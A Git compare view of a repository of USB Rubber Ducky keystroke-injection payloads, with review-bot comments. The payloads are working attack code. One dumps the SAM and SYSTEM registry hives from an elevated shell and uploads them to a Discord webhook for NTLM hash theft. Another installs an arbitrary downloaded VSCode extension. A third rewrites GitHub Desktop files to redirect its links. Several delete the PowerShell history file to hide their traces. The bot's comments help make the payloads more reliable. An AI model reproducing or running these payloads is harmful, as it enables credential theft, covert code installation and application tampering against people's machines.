Compare commits
33 Commits
129b207d26
...
52086d7968
Author | SHA1 | Date |
---|---|---|
Aleff | 52086d7968 | |
Peaks | 675972662a | |
Luu | 0df3011601 | |
Luu | a81ecd3e64 | |
Luu | c898ed7858 | |
Luu | 15f8f25701 | |
Peaks | adb9af43f8 | |
Aleff | 3cf199170c | |
Peaks | fd272a60f4 | |
Aleff | 9f1222ba05 | |
Aleff | d934d9d4de | |
Aleff | f031b928a8 | |
Aleff | bb89731ae2 | |
Aleff | 9c4257edbd | |
Aleff | d3e494fd12 | |
Peaks | 02641718a0 | |
Aleff | 2c84ff499c | |
Peaks | 7883e2bc50 | |
Alessandro Greco | b1fae99ade | |
Alessandro Greco | 52c42dfc10 | |
Alessandro Greco | 6e3f5924c0 | |
Aleff | 71d5eaf378 | |
Alessandro Greco | 1fa6cea874 | |
Aleff | e5254c68a2 | |
Alessandro Greco | d350174b13 | |
Alessandro Greco | 284195f4cd | |
Alessandro Greco | 82fcf60fab | |
aleff-github | fe6c828d62 | |
aleff-github | 39ae8691ff | |
Aleff | 3f27f53b23 | |
aleff-github | 8c4ced3125 | |
aleff-github | d44fd457a3 | |
Aleff | 4ca40bc5a8 |
|
@ -0,0 +1,98 @@
|
|||
# Install Any Arbitrary VSCode Extension
|
||||
|
||||
This DuckyScript script is designed to automate the installation of any arbitrary Visual Studio Code (VSCode) extension on Windows 10. It performs the following tasks:
|
||||
|
||||
1. Removes any pre-existing version of the extension (if applicable).
|
||||
2. Downloads a ZIP archive of a VSCode extension.
|
||||
3. Extracts the extension to the correct VSCode extensions folder.
|
||||
|
||||
The script makes use of PowerShell to manage file paths and execute commands necessary for the installation process. The user must provide the name of the extension folder and the link to the ZIP archive containing the extension.
|
||||
|
||||
## First Of All!
|
||||
|
||||
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
|
||||
|
||||
So...
|
||||
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
|
||||
- Always check the source and source code before doing this
|
||||
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
|
||||
|
||||
## Features
|
||||
|
||||
- Detects Windows passively through [PASSIVE_WINDOWS_DETECT](https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt) by Hak5.
|
||||
- Installs a VSCode extension by downloading a ZIP file and extracting it to the correct location.
|
||||
- Removes any previous version of the extension.
|
||||
- Completely automated, requiring no manual intervention once the script is executed.
|
||||
|
||||
## Requirements
|
||||
|
||||
- **Target OS**: Windows 10/11
|
||||
- **VSCode Path**: The script assumes that VSCode is installed in its default location. If it is installed in a different location, the paths in the script may need to be updated.
|
||||
- **Compilation**: Make sure that the extension you are going to install has the out folder inside, that is, the folder that is generated as a result of compilation. Without this folder the extension cannot be loaded properly.
|
||||
- **Internet Connection**: This is mandatory in case you want to download the archive from the Internet, whereas if you want to download from a server in the intranet you only need to be connected to the local network. This basically depends on the individual case....
|
||||
|
||||
## Usage
|
||||
|
||||
### DuckyScript Configuration
|
||||
|
||||
Before running the script, make sure to configure the following two variables in the script:
|
||||
|
||||
1. `#EXTENSION_NAME`: Replace this with the name of the folder where the extension will be installed.
|
||||
```plaintext
|
||||
DEFINE #EXTENSION_NAME example
|
||||
```
|
||||
Example: If the extension folder name is `DuckyScriptCookbook`, then replace `example` with `DuckyScriptCookbook`.
|
||||
|
||||
2. `#ARCHIVE_LINK`: Replace this with the actual URL to the ZIP file of the VSCode extension you want to install.
|
||||
```plaintext
|
||||
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
|
||||
```
|
||||
|
||||
### PowerShell Commands Breakdown
|
||||
|
||||
- **Detecting and Removing Previous Extension**: The script checks if an official version of the extension is already installed and removes it:
|
||||
```powershell
|
||||
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
if (Test-Path -Path $extensionsPath -PathType Container) {
|
||||
Remove-Item -Recurse -Force -Path $extensionsPath
|
||||
}
|
||||
```
|
||||
|
||||
- **Downloading and Extracting the New Extension**: The script downloads the extension from the link provided inside a temporary folder and extracts it inside the official (the default) VSCode extensions folder:
|
||||
```powershell
|
||||
$url = "#ARCHIVE_LINK"
|
||||
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
|
||||
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
Invoke-WebRequest -Uri $url -OutFile $downloadPath
|
||||
if (Test-Path -Path $downloadPath) {
|
||||
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
|
||||
Remove-Item -Path $downloadPath -Force
|
||||
}
|
||||
```
|
||||
|
||||
## Notes
|
||||
- Ensure that the ZIP file is structured properly (i.e., it contains all necessary files for the extension) before attempting to install.
|
||||
- Make sure that PowerShell is available on the target machine.
|
||||
- This script is intended for Windows 10/11 systems. Compatibility with other versions of Windows has not been tested.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
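Review bot: The introduction says the script targets Windows 10, while Requirements and Notes both say Windows 10/11; pick one and use it throughout. "Arbotrary" under "First Of All!" should be "Arbitrary". The PowerShell breakdown stops at `Remove-Item -Path $downloadPath -Force`, but the payload in this range also runs `Remove-Item (Get-PSReadlineOption).HistorySavePath; exit` inside the same block. Deleting the user's PowerShell history file is a side effect the README should state, as the official-extension README does under Features.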
@ -0,0 +1,88 @@
|
|||
REM_BLOCK
|
||||
##########################################################
|
||||
# #
|
||||
# Title : Install Any Arbitrary VSCode Extension #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10 #
|
||||
# #
|
||||
##########################################################
|
||||
END_REM
|
||||
|
||||
REM Replace "example" with the name of the extension folder
|
||||
DEFINE #EXTENSION_NAME example
|
||||
|
||||
REM Replace "https://example.com/path/to/archive.zip" with your own ZIP Archive link
|
||||
DEFINE #ARCHIVE_LINK https://example.com/path/to/archive.zip
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
$extensionsPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
|
||||
if (Test-Path -Path $extensionsPath -PathType Container) {
|
||||
Remove-Item -Recurse -Force -Path $extensionsPath
|
||||
}
|
||||
END_STRINGLN
|
||||
|
||||
REM May it depends by the extension...
|
||||
DELAY 2000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
$url = "#ARCHIVE_LINK"
|
||||
$downloadPath = "$env:TEMP\#EXTENSION_NAME.zip"
|
||||
$extractPath = "$env:USERPROFILE\AppData\Local\Programs\Microsoft VS Code\resources\app\extensions\#EXTENSION_NAME"
|
||||
Invoke-WebRequest -Uri $url -OutFile $downloadPath
|
||||
if (Test-Path -Path $downloadPath) {
|
||||
Expand-Archive -Path $downloadPath -DestinationPath $extractPath -Force
|
||||
Remove-Item -Path $downloadPath -Force
|
||||
Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
}
|
||||
END_STRINGLN
|
|
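Review bot: `$_OS` is set by PASSIVE_WINDOWS_DETECT but never read, so `GUI r` and both STRINGLN_POWERSHELL blocks run whatever host was detected. Wrap everything after END_EXTENSION in `IF ($_OS == WINDOWS) THEN` ... `END_IF`, as the extension's own usage block shows, so nothing is typed into a non-Windows host. The header also says `Target : Windows 10` while the README lists Windows 10/11, and `REM May it depends by the extension...` should say what the 2000 ms delay is waiting for.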
@ -0,0 +1,55 @@
|
|||
# Install Official VSCode Extension
|
||||
|
||||
This script automates the installation of an official Visual Studio Code extension on Windows 10/11 systems. The extension to be installed is specified via the `publisher.extensionName` parameter. The script uses passive operating system detection to determine if the system is running Windows, and proceeds with the extension installation accordingly.
|
||||
|
||||
## First Of All!
|
||||
|
||||
Installing Arbotrary Visual Studio Code (VSCode) extensions can pose cybersecurity risks because extensions, often developed by third parties, have access to critical functionalities of the editor and the operating system. A malicious extension could execute harmful code, access local files, or exfiltrate sensitive data without the user's knowledge. Additionally, if extensions are not from trusted sources or are not regularly updated, they may contain vulnerabilities that attackers can exploit, compromising the security of both the system and the entire development environment.
|
||||
|
||||
So...
|
||||
- Before doing these tests make sure you have full permission from the owner of the computer in case it is not you.
|
||||
- Always check the source and source code before doing this
|
||||
- If even one line of code is not clear to you, you should not proceed at all because it takes only a little to do damage.
|
||||
|
||||
## Features
|
||||
|
||||
- **Passive Windows Detection:** The script includes an extension (`PASSIVE_WINDOWS_DETECT`) that passively detects if the operating system is Windows.
|
||||
- **VSCode Extension Installation:** It uses the `code --install-extension` command to install the specified VSCode extension.
|
||||
- **Windows 10/11 Compatibility:** Designed to work on Windows 10 and 11.
|
||||
- **PowerShell History Cleanup:** After installation, the PowerShell history is cleared.
|
||||
|
||||
## Usage
|
||||
|
||||
### Required Parameter
|
||||
|
||||
- **#EXTENSION**: This parameter represents the ID of the VSCode extension you wish to install. The ID should follow the format `publisher.extensionName` (e.g., `Aleff.duckyscriptcookbook`).
|
||||
|
||||
## Requirements
|
||||
|
||||
- **Operating System**: Windows 10 or 11
|
||||
- **PowerShell**
|
||||
- **Visual Studio Code**
|
||||
- **Internet**
|
||||
- **Permissions to execute commands in PowerShell**
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
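Review bot: The "First Of All!" paragraph is copied from the arbitrary-extension README, including the "Arbotrary" typo, and talks about arbitrary extensions although this payload installs by `publisher.extensionName` ID through `code --install-extension`; fix the typo and adjust the wording to this payload. Requirements should also say that the `code` command has to be on PATH, since the payload calls it by bare name, and "Internet" and "PowerShell" would read better with a short qualifier, as in the other README.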
@ -0,0 +1,64 @@
|
|||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Install Official VSCode Extension #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
REM replace 'publisher.extensionName' with the publisher id and extension id, for istance 'Aleff.duckyscriptcookbook'
|
||||
DEFINE #EXTENSION publisher.extensionName
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN code --install-extension #EXTENSION; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
|
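Review bot: The README says the script uses OS detection and "proceeds with the extension installation accordingly", but nothing after END_EXTENSION reads `$_OS`; either guard the `GUI r` through `STRINGLN code --install-extension` lines with `IF ($_OS == WINDOWS) THEN` or correct the README. "istance" in the REM above `DEFINE #EXTENSION` should be "instance".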
@ -0,0 +1,69 @@
|
|||
# Replace Links In GithubDesktop
|
||||
|
||||
This script is written in **DuckyScript** and is designed to modify links in the GitHub Desktop application on Windows 10/11 systems. It automates the replacement of GitHub URLs with a custom URL defined by the user.
|
||||
|
||||
![](https://github.com/aleff-github/Deposito/blob/main/Replace_Links_In_GithubDesktop/GithubDesktop.gif?raw=true)
|
||||
|
||||
## Table of Contents
|
||||
|
||||
- [Features](#features)
|
||||
- [Prerequisites](#prerequisites)
|
||||
- [Usage](#usage)
|
||||
- [Credits](#credits)
|
||||
|
||||
## Features
|
||||
|
||||
This script replaces the hardcoded GitHub links in the `renderer.js` and `main.js` files inside the GitHub Desktop application with a custom link provided by the user. It does the following:
|
||||
|
||||
1. Detects the installation folder of GitHub Desktop.
|
||||
2. Identifies the latest installed version of GitHub Desktop. It may happen that there are multiple versions on the computer but it is always the most recent one that is used, I would suggest to Github Desktop developers to remove old versions that unnecessarily burden a computer.
|
||||
3. Replaces any occurrences of GitHub URLs in the `renderer.js` and `main.js` files with a new link defined by the user.
|
||||
|
||||
The script uses **PowerShell** to perform this replacement after detecting the operating system and target files.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- **Windows 10/11**
|
||||
- **GitHub Desktop** installed on the machine.
|
||||
|
||||
## Usage
|
||||
|
||||
1. **Modify the script**:
|
||||
- Define the new URL to replace the original GitHub link by modifying the `#NEW_LINK` variable in the script:
|
||||
```duckyscript
|
||||
DEFINE #NEW_LINK example.com
|
||||
```
|
||||
|
||||
2. **Customization**:
|
||||
- Ensure that the path to GitHub Desktop is correct. If GitHub Desktop is installed in a non-default location, modify the `#SUBDIRECTORY` variable accordingly:
|
||||
```ducky
|
||||
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
|
||||
```
|
||||
|
||||
3. **Execution**:
|
||||
- Upon execution, the script will:
|
||||
- Open PowerShell.
|
||||
- Detect the GitHub Desktop installation directory.
|
||||
- Replace all GitHub URLs in the `renderer.js` and `main.js` files with the new URL you specified.
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Aleff :octocat: </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/aleff-github">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
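Review bot: The README never states that `renderer.js` and `main.js` are rewritten in place with no copy of the originals, or that the payload deletes the PowerShell history file on exit; both belong under Features or a Notes section, together with how to restore the application after a test. This README also lacks the authorization warning ("First Of All!") that the two VSCode READMEs in this range carry. The two code fences use different tags (`duckyscript` and `ducky`) and the VSCode README uses `plaintext` for the same kind of line; use one. The aside to the GitHub Desktop developers in Features item 2 reads better as a separate note.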
@ -0,0 +1,109 @@
|
|||
REM_BLOCK
|
||||
#####################################################
|
||||
# #
|
||||
# Title : Replace Links In GithubDesktop #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Execution #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
#####################################################
|
||||
END_REM
|
||||
|
||||
|
||||
REM REQUIRED - Define here the new url that will replace the original github link
|
||||
DEFINE #NEW_LINK example.com
|
||||
|
||||
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
|
||||
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
|
||||
|
||||
|
||||
REM_BLOCK
|
||||
Credits: Hak5 LLC
|
||||
Website: https://hak5.org/
|
||||
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
|
||||
END_REM
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN PowerShell
|
||||
DELAY 1000
|
||||
|
||||
STRINGLN_POWERSHELL
|
||||
$path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
|
||||
|
||||
$folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
|
||||
|
||||
$versions = $folders | ForEach-Object {
|
||||
[PSCustomObject]@{
|
||||
FolderName = $_.Name
|
||||
Version = [version]($_.Name -replace "app-", "")
|
||||
}
|
||||
}
|
||||
|
||||
$latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
|
||||
|
||||
$latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
|
||||
$latestFolderPath += "\resources\app\"
|
||||
$renderer = "renderer.js"
|
||||
$main = "main.js"
|
||||
|
||||
$filePath = "$latestFolderPath$renderer"
|
||||
|
||||
$fileContent = Get-Content $filePath
|
||||
$regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
|
||||
$modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
|
||||
Set-Content -Path $filePath -Value $modifiedContent
|
||||
|
||||
|
||||
$filePath = "$latestFolderPath$main"
|
||||
$fileContent = Get-Content $filePath
|
||||
$regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
|
||||
$modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
|
||||
Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
|
||||
|
||||
END_STRINGLN
|
|
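Review bot: Both `Set-Content -Path $filePath -Value $modifiedContent` calls overwrite the application's files without keeping the originals, so a test cannot be reverted short of reinstalling GitHub Desktop; copy each file aside before writing, or document the restore step. There is also no check that any `app-*` folder was found: when `$folders` is empty, `$latestVersionFolder` is null and the later `Get-Content` and `Set-Content` run against a path that was never resolved. Return early in that case.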
@ -0,0 +1,28 @@
|
|||
# Exfiltrate NTLM Hash - Windows ✅
|
||||
|
||||
A script used to exfiltrate the NTLM hash on a Windows machine.
|
||||
|
||||
## Description
|
||||
|
||||
A script used to capture and exfiltrate the NTLM hash of a Windows machine. It utilizes PowerShell to retrieve the SAM and SYSTEM files, then sends them to a Discord webhook. These files can than be used to extract the NTLM hash of all users.
|
||||
|
||||
### Settings
|
||||
|
||||
* Set the Discord webhook URL
|
||||
* Ensure the webhook permissions are configured
|
||||
|
||||
## Credits
|
||||
|
||||
<h2 align="center"> Luu176 </h2>
|
||||
<div align=center>
|
||||
<table>
|
||||
<tr>
|
||||
<td align="center" width="96">
|
||||
<a href="https://github.com/luu176">
|
||||
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</div>
|
|
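Review bot: The Description omits what the payload needs and what it leaves behind: it opens an elevated PowerShell (`-Verb runAs`), writes copies of the hives named `sam` and `system` to the working directory, and sends them to a third-party service. State these under Settings or a Requirements section so that whoever runs an authorized test can account for those files afterwards. This README also lacks the authorization warning the other READMEs in this range carry. "These files can than be used" should be "then".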
@ -0,0 +1,34 @@
|
|||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
END_EXTENSION
|
||||
|
||||
DEFINE #DISCORD_WEBHOOK_URL DISCORD_WEBHOOK_URL_HERE
|
||||
GUI d
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||
DELAY 3000
|
||||
LEFTARROW
|
||||
ENTER
|
||||
DELAY 3000
|
||||
STRINGLN C:\Windows\System32\reg save HKLM\SAM sam /y; C:\Windows\System32\reg save HKLM\SYSTEM system /y; Add-Type -AssemblyName "System.Net.Http"; $webhookUrl = "#DISCORD_WEBHOOK_URL"; $client = New-Object System.Net.Http.HttpClient; $fileStream1 = [System.IO.File]::OpenRead("sam"); $fileContent1 = New-Object System.Net.Http.StreamContent($fileStream1); $content1 = New-Object System.Net.Http.MultipartFormDataContent; $content1.Add($fileContent1, "file", "sam"); $client.PostAsync($webhookUrl, $content1).Result; $fileStream1.Close(); $fileStream2 = [System.IO.File]::OpenRead("system"); $fileContent2 = New-Object System.Net.Http.StreamContent($fileStream2); $content2 = New-Object System.Net.Http.MultipartFormDataContent; $content2.Add($fileContent2, "file", "system"); $client.PostAsync($webhookUrl, $content2).Result; $fileStream2.Close()
|
||||
DELAY 500
|
||||
GUI d
|
|
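Review bot: This payload has no `REM_BLOCK` header (Title, Author, Version, Category, Target), unlike every other payload in this range; add one so the target OS and the need for elevation are visible at the top of the file. `$_OS` is computed by the extension but never checked before `GUI d`, so the keystrokes are sent to any host.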
@ -0,0 +1,74 @@
|
|||
# Pranh(ex)
|
||||
|
||||
This script is named Prenh(ex) because it is the union between **Prank**, the payload section of Hak5, and hex which represents the heart of the payload itself since it is installed following a conversion to **hexadecimal**. This script also contains a Time-Based **Easter Egg** so if you want to enjoy the joke don't read the code and wait a few seconds. ^^
|
||||
|
||||
Executables have been removed for security reasons.
|
||||
|
||||
**Category**: Prank
|
||||
|
||||
![](assets/1.gif)
|
||||
|
||||
## Description
|
||||
|
||||
This script is named Prenh(ex) because it is the union between Prank, the payload section of Hak5, and hex which represents the heart of the payload itself since it is installed following a conversion to hexadecimal. This script also contains a Time-Based Easter Egg so if you want to enjoy the joke don't read the code and wait a few seconds. ^^
|
||||
|
||||
Installing and running executables on machines without explicit owner authorization can **lead to significant damage** both to the **machine** and **legal repercussions** for those who choose to do so. It is crucial to respect ownership rights and seek proper authorization to ensure the security and integrity of the system while staying within the boundaries of the law.
|
||||
|
||||
## Explanation of Prank
|
||||
|
||||
This Python script is designed to be a playful prank, creating a series of unexpected and humorous pop-up messages that make it challenging for the user to close the windows. It utilizes the ctypes library to interact with the Windows API for displaying message boxes with customized icons and button options. The code defines a function, show_error_popup, which takes a message as input and enters an infinite loop, constantly prompting the user with pop-up messages. These messages employ amusing responses to user interactions, such as changing the message text or providing comical feedback. Overall, it's a lighthearted piece of code that aims to entertain and surprise anyone who runs it.
|
||||
|
||||
1. You import the necessary libraries, such as ctypes and sleep.
|
||||
|
||||
2. You define a show_error_popup function that takes a message as an argument.
|
||||
|
||||
3. Inside this function, you start an infinite while loop.
|
||||
|
||||
4. You use ctypes.windll.user32.MessageBoxW to create a popup with the specified message. This popup has an error icon (MB_ICONERROR) and a single "OK" button (MB_OK).
|
||||
|
||||
5. You check the result returned by the dialog window. If the user clicks "OK" (returned value 1), the message is changed to "What do you believe yourself? That I leave so easily?" and the popup is reopened.
|
||||
|
||||
6. If the user clicks "Cancel" (returned value 2), a second popup is displayed with the message "Are you sure you want to close? I will miss you :'(". This popup has an error icon (MB_ICONERROR) and two buttons: "Yes" and "No."
|
||||
|
||||
7. If the user clicks "Yes" (returned value 6) in the second popup, a third popup appears with the message "Okay, I'll stop. But don't get mad...". This popup has an information icon (MB_ICONINFORMATION), and the loop is terminated, thus closing the popup.
|
||||
|
||||
8. If the user clicks "No" in the second popup, the message is changed to "You seem a little indecisive honestly...", and the popup is reopened.
|
||||
|
||||
9. Finally, the show_error_popup function is called with an initial error message, and the popup will be opened. After the user interacts with the popup, there is a 60-second delay before a final popup is displayed with a farewell message.
|
||||
|
||||
